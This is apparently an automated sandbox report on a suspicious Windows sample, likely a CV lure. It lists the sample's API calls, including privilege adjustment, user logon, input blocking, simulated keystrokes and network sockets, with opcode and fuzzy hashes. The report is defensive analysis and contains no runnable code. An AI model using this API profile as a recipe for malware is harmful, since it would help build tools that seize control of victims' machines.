                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003C13DC
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($,2C$<2C$|
                                                                                        • API String ID: 1659193697-3219782434
                                                                                        APIs
                                                                                          • Part of subcall function 003DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003D9296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003D92B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: d3d725d5f8c31bbc8cdc986c4a9613da7f6804643ab30157144af3d84a705e87
                                                                                        • Instruction ID: 39d37d96d68dfe8a2fc3c1f4a520d122e4c838baefc8149c6b199d46baf733bc
                                                                                        • Opcode Fuzzy Hash: d3d725d5f8c31bbc8cdc986c4a9613da7f6804643ab30157144af3d84a705e87
                                                                                        • Instruction Fuzzy Hash: 5E41CE71A00204AFDB16BB68CC82F7E77EDEF44728F048459F956AB392DB749D018B91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CEB8A
                                                                                        • _wcscmp.LIBCMT ref: 003CEBBA
                                                                                        • _wcscmp.LIBCMT ref: 003CEBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003CEBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003CEC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 32081f5bd302b1cf806463109de704530619ffaf8c2d42e7390faef9e5eee745
                                                                                        • Instruction ID: e41ba923017f5e2932117381b9cbabd8023fa15b8e8ed8f38b871c3ab69a5846
                                                                                        • Opcode Fuzzy Hash: 32081f5bd302b1cf806463109de704530619ffaf8c2d42e7390faef9e5eee745
                                                                                        • Instruction Fuzzy Hash: 1A41BB356046029FCB09DF68C491EAAB3E8FF49324F10855EE95ACB3A1DB31ED44CB95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 0a6277ba88675673d8fcea482e9d154719f565823fdd3555c84ec305f303fa2c
                                                                                        • Instruction ID: 28a5c987c82a0779a545d5c1066a6d451b77d531f769fd78301729bb7a03d24d
                                                                                        • Opcode Fuzzy Hash: 0a6277ba88675673d8fcea482e9d154719f565823fdd3555c84ec305f303fa2c
                                                                                        • Instruction Fuzzy Hash: 06119031B006606FE7226F66DD44A6F779CEF44760B050529F849E7281CF30E90286A4
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0039E014,74DF0AE0,0039DEF1,0041DC38,?,?), ref: 0039E02C
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0039E03E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: f1c4f0a45428a65fbdacf12a0a76d77f43047358237d1cbbd85e61de05964c21
                                                                                        • Instruction ID: bea25011cebd8522d5ff7be4a36515865c99f840744a1415beda05c1f662e177
                                                                                        • Opcode Fuzzy Hash: f1c4f0a45428a65fbdacf12a0a76d77f43047358237d1cbbd85e61de05964c21
                                                                                        • Instruction Fuzzy Hash: 6ED0A7318007129FCB329FA2EE0A71276D5AB08301F29843AE881E2250FBF8C8848654
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 0039B22F
                                                                                          • Part of subcall function 0039B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0039B5A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Proc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2749884682-0
                                                                                        • Opcode ID: 1708b3f302f7052ad9302b54269ca43b9193cc0945f18bde356d6fe0ca568c85
                                                                                        • Instruction ID: 2e222738d95d66247750749bf239a29265e12600e66c370e2f70531865eb3deb
                                                                                        • Opcode Fuzzy Hash: 1708b3f302f7052ad9302b54269ca43b9193cc0945f18bde356d6fe0ca568c85
                                                                                        • Instruction Fuzzy Hash: A7A18F70114109BADF3BAF6B7E88D7FA95DEB42740B124A2DF581DA9E1CB24DC00D272
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D43BF,00000000), ref: 003D4FA6
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D4FD2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: 9530bb12751286ab6b96cb07b912aaf8826fb21d7c48980da636cca28b92481b
                                                                                        • Instruction ID: 9d71dbe9311cfa2da416692a12bbf37827264071a21bacc8867731805a04a5b1
                                                                                        • Opcode Fuzzy Hash: 9530bb12751286ab6b96cb07b912aaf8826fb21d7c48980da636cca28b92481b
                                                                                        • Instruction Fuzzy Hash: 3041E773904209BFEB22DF94ED81FBFB7BCEB40754F10402BF205A6290DA719E4596A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \QC
                                                                                        • API String ID: 4104443479-3599921913
                                                                                        • Opcode ID: 469d456c8af3bf84d0805f8431589c5c830c1ca61e1c2dac828d5d2ef0ba6547
                                                                                        • Instruction ID: c7cd03fba19a753b6455e8ab2abe9ea92a35e3709acb3544c0f2877bc789bd9a
                                                                                        • Opcode Fuzzy Hash: 469d456c8af3bf84d0805f8431589c5c830c1ca61e1c2dac828d5d2ef0ba6547
                                                                                        • Instruction Fuzzy Hash: EAA25B74A04219CFCB25DF58C4807ADBBB2FF48314F2581AAE859AB390D7749E81DF94
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CE20D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CE267
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CE2B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 4f569b72c02db86f2f6c08ff6a0ab7ed378a2ca87ecf4c40d9a0b6e6e29ba2d4
                                                                                        • Instruction ID: 84ddbe1383daa7e54d7c1e2ed592d15b72ca1b6bc1afc9d4dc120d5419eafadb
                                                                                        • Opcode Fuzzy Hash: 4f569b72c02db86f2f6c08ff6a0ab7ed378a2ca87ecf4c40d9a0b6e6e29ba2d4
                                                                                        • Instruction Fuzzy Hash: FB216D35A00618EFCB01EFA5D885EAEFBB8FF48310F0484A9E905EB251DB31D905CB54
                                                                                        APIs
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                        • GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 221251f1e997057f0bd5c633ed2d2ec067196d115413cedcab9f6f335e086eff
                                                                                        • Instruction ID: f607098f2ad1b34b1b85a1ef85d4f98d4784494f7c536d2bafc2de04a42838d8
                                                                                        • Opcode Fuzzy Hash: 221251f1e997057f0bd5c633ed2d2ec067196d115413cedcab9f6f335e086eff
                                                                                        • Instruction Fuzzy Hash: 9111C1B1800204AFE7189F58DCC5D6BB7BCFB44314B20852EF45697640DBB0FC418B60
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003C6623
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003C6664
                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003C666F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: 9c91877a44f0f2195f135102448c5417e77d84d713159957523564e0ebeb7ddc
                                                                                        • Instruction ID: cdc1ce2b596ae334ee9c9ad8523d46974a4ff2945bf79a51a8b997df2a452f86
                                                                                        • Opcode Fuzzy Hash: 9c91877a44f0f2195f135102448c5417e77d84d713159957523564e0ebeb7ddc
                                                                                        • Instruction Fuzzy Hash: 46110C71E01228BFDB118FA59D45FAEBBBCEB49B10F104166F900F6290D6B05E058BA5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003C7223
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003C723A
                                                                                        • FreeSid.ADVAPI32(?), ref: 003C724A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 5c743a5378a6cbcdd885ed2e863ca642aa3bc20a3ed406e2bf590b9bb7a159db
                                                                                        • Instruction ID: 9e9a686b9f2d1c73ac8e572638c35d98defa81d161dd3ae97f9491e7b47c8835
                                                                                        • Opcode Fuzzy Hash: 5c743a5378a6cbcdd885ed2e863ca642aa3bc20a3ed406e2bf590b9bb7a159db
                                                                                        • Instruction Fuzzy Hash: 88F01D76E04209BFDF04DFF4DD89EEEBBB8EF08205F104869A606F2191E2709A448B14
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CF599
                                                                                        • FindClose.KERNEL32(00000000), ref: 003CF5C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 3949a83f321ce68b04475ab3ce9a0f2172e4ae1813557d724e0489b2ca757175
                                                                                        • Instruction ID: 834d4609ba5b732c0ad91657acf7fc4effed0ad77a58edaaf3dde17c28c8df5f
                                                                                        • Opcode Fuzzy Hash: 3949a83f321ce68b04475ab3ce9a0f2172e4ae1813557d724e0489b2ca757175
                                                                                        • Instruction Fuzzy Hash: EA11A5316006009FD701EF28D845A2EB3E9FF85324F00851EF965DB291CB30ED048B85
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003DBE6A,?,?,00000000,?), ref: 003CCEA7
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003DBE6A,?,?,00000000,?), ref: 003CCEB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 07e355024991205bd81a53b401668cb4b9aeef7b0203afcdca5053b33c88f982
                                                                                        • Instruction ID: 429743e23648155ec83956af3c735a3d8466a3730206c4bf17557c9bb54a33d3
                                                                                        • Opcode Fuzzy Hash: 07e355024991205bd81a53b401668cb4b9aeef7b0203afcdca5053b33c88f982
                                                                                        • Instruction Fuzzy Hash: 46F08235510229ABDB11ABA4DC49FEA776DFF09352F004169F919D6181D6309A44CBA4
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003C4153
                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 003C4166
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: a0980b94f5c5e6d86d5edf9d9c626acd5217cbad0c335491f51dfb61cfb660b0
                                                                                        • Instruction ID: 447d3de404ec9bf834227ad364d9fee180d103d5ca36bdbfa46273405d5ec440
                                                                                        • Opcode Fuzzy Hash: a0980b94f5c5e6d86d5edf9d9c626acd5217cbad0c335491f51dfb61cfb660b0
                                                                                        • Instruction Fuzzy Hash: E8F0677080024DAFDB069FA0CC05BBE7FB4EF00305F04801AF966A6292D7798A169FA4
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003BACC0), ref: 003BAB99
                                                                                        • CloseHandle.KERNEL32(?,?,003BACC0), ref: 003BABAB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 818f789049f769f4280e63bee281fc7dcc74c84ba1e5b9a90a3b1bf11779e135
                                                                                        • Instruction ID: e8d3dff357b3bc835441601f8f4c768f0896af154863feec93ebd2fa2c0fa915
                                                                                        • Opcode Fuzzy Hash: 818f789049f769f4280e63bee281fc7dcc74c84ba1e5b9a90a3b1bf11779e135
                                                                                        • Instruction Fuzzy Hash: C7E0BF71000510AFEB262F54ED05D767BA9EB04320711C529B95985470DB725C949B50
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,003A6DB3,-0000031A,?,?,00000001), ref: 003A81B1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003A81BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 5cfaf87fe69b219c41bcc406a5c0e82880422af8cf6baf2c79a15183a0da8084
                                                                                        • Instruction ID: db2a0a7d1f28075f13e78cf74185e6d59cfc03f784146b53b9af76b1de98ca7c
                                                                                        • Opcode Fuzzy Hash: 5cfaf87fe69b219c41bcc406a5c0e82880422af8cf6baf2c79a15183a0da8084
                                                                                        • Instruction Fuzzy Hash: 7FB09231444608ABDB002BE1ED09B587F68EB08652F004030FE0D540618B7254188A9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 54c443a6ffba0bf11cd12a56eace215d4e918a77e27399e945d2a595ab8071b3
                                                                                        • Instruction ID: f2438ef10ad54e5ad97f741e7f5d8d9d82797e900d7f05b64b3c9fa7f6257dab
                                                                                        • Opcode Fuzzy Hash: 54c443a6ffba0bf11cd12a56eace215d4e918a77e27399e945d2a595ab8071b3
                                                                                        • Instruction Fuzzy Hash: 84320422D29F414DD7239634D922336A29CEFB73D4F15D737E82AB5DAAEB29C4834104
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 8b59b4d11961e789f07e48aea945d2c377dc2ae9e9433920d66c7b9e24945933
                                                                                        • Instruction ID: 5b2e2cddbf5c0423550044b6e0ff4571cda3c18370e127cb06f38f3bc27d7cc0
                                                                                        • Opcode Fuzzy Hash: 8b59b4d11961e789f07e48aea945d2c377dc2ae9e9433920d66c7b9e24945933
                                                                                        • Instruction Fuzzy Hash: E422DD716083059FD726EF24C890B6FB7E4BF84310F19495EF99A8B291DB71E904CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6ff953d64e878191c6320b0d032b1e51eebf917d91c94046ab3cffca200595d
                                                                                        • Instruction ID: dc02c792e29fa7fbf1397f8aa21f6b2daa26abd139d5ffd3cff33113f179635f
                                                                                        • Opcode Fuzzy Hash: d6ff953d64e878191c6320b0d032b1e51eebf917d91c94046ab3cffca200595d
                                                                                        • Instruction Fuzzy Hash: 12B1D120D2AF418DD22396398831376BB5CAFFB2D5F91D72BFC1A74D22EB2185834184
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 003CB6DF
                                                                                          • Part of subcall function 003A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003CBDC3,00000000,?,?,?,?,003CBF70,00000000,?), ref: 003A3453
                                                                                          • Part of subcall function 003A344A: __aulldiv.LIBCMT ref: 003A3473
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: 2275d33629e32d6c60695f890742155eec07a563f760c5993fadb721c8f751f1
                                                                                        • Instruction ID: a9a8a0cbed10aa2cd4c00640cbdf8382b43078d4a09a90893eba186ad11ade40
                                                                                        • Opcode Fuzzy Hash: 2275d33629e32d6c60695f890742155eec07a563f760c5993fadb721c8f751f1
                                                                                        • Instruction Fuzzy Hash: EF2160766345108BC72ACF28C481A52F7E5EB95711B248E7DE4E5CB280CB74AD05DB54
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 003D6ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C74DE
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003BAD3E), ref: 003BB124
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003A818F
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3728558374-0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
